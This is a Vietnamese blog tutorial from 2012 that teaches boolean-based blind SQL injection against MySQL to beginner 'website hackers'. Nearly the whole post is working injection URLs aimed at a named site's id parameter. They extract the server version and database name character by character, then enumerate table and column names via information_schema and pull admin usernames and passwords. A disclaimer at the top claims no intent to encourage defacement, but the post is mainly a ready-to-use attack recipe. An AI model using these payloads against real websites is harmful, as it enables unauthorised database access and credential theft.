Vài lời cho các bạn !

Blog được xây dựng nhằm cung cấp, sưu tầm nguồn hướng dẫn cho các newbie học tập về hacking website, chứ không mang tính chất vẽ đường cho ai đó đi phá hoại(deface) nhằm gây tổn hại cho website hay sever nào đó. Mong you hãy coi đây như là cuốn ebook hay và bổ ích, cần là giở để xem. và hãy tận dụng nó đúng mục đích ! thanks !

Sunday, May 20, 2012

Sơ sơ về blind

Sơ sơ về blind cho anh em dễ hiểu:
+Tìm version() em nó là version mấy:
Quote:
http://mumauden.com/tgh.php?id=1 and substring(version(),1,1)=3 >>ver 3
http://mumauden.com/tgh.php?id=1 and substring(version(),1,1)=4 >>ver 4
http://mumauden.com/tgh.php?id=1 and substring(version(),1,1)=5 >>ver 5
Muốn biết chính xác nó version mấy: vidu nó là ver 5.1.21 nhé
Quote:
http://mumauden.com/tgh.php?id=1 and ascii(substring(version(),1,1))=53 >>5
http://mumauden.com/tgh.php?id=1 and ascii(substring(version(),2,1))=46 >>.
http://mumauden.com/tgh.php?id=1 and ascii(substring(version(),3,1))=49 >>1
http://mumauden.com/tgh.php?id=1 and ascii(substring(version(),4,1))=46 >>.
http://mumauden.com/tgh.php?id=1 and ascii(substring(version(),5,1))=50 >>2
http://mumauden.com/tgh.php?id=1 and ascii(substring(version(),6,1))=49 >>1
+ Tìm database(),user()
Quote:
http://mumauden.com/tgh.php?id=1 and length(database()) = 6
Nếu database là 6 ký tự, các bạn có thể dùng dấu > hoặc < để rút khoảng cách tìm ra số lượng ký tự
http://mumauden.com/tgh.php?id=1 and length(database()) > 5 ok
http://mumauden.com/tgh.php?id=1 and length(database()) >6 lỗi
>> số lượng ký tự = 6 
Quote:
http://mumauden.com/tgh.php?id=1 and ascii(substring(database(),1,1))= 116 >>t
http://mumauden.com/tgh.php?id=1 and ascii(substring(database(),2,1))= 103 >>g
http://mumauden.com/tgh.php?id=1 and ascii(substring(database(),3,1))= 104 >>h
http://mumauden.com/tgh.php?id=1 and ascii(substring(database(),4,1))= 109 >>m
http://mumauden.com/tgh.php?id=1 and ascii(substring(database(),5,1))= 109 >>m
http://mumauden.com/tgh.php?id=1 and ascii(substring(database(),6,1))= 100 >>d
>>database()= tghmmd
+Get thông tin
++table_name:
+++table đầu tiên trong dãy table_name
Quote:
http://mumauden.com/tgh.php?id=1 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))= 116 >> t
>>còn làm tương tự ,nhớ length để biết số lượng ký tự trong table_name đầu tiên nhé
++column name:
+++column đầu tiên trong dãy column_name trong 1 table
Quote:
http://mumauden.com/tgh.php?id=1 and ascii(substring((select column_name from information_schema.columns where table_schema=database() and table_name=0xtable_name conver to hex limit 0,1),1,1))= 116 >> t
+get user/pass: vidụ username/password trong table admin nhé
Quote:
http://mumauden.com/tgh.php?id=1 and ascii(substring((select username from admin limit 0,1),1,1))= 97 >> a
Chú ý : 
-Các bạn cứ tăng giá trị 1,1 của substring lên 2,1 để get số ký tự
-Các bạn cứ tăng giá trị 0,1 của limit lên 1,1 để get số table_name,colum_name

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)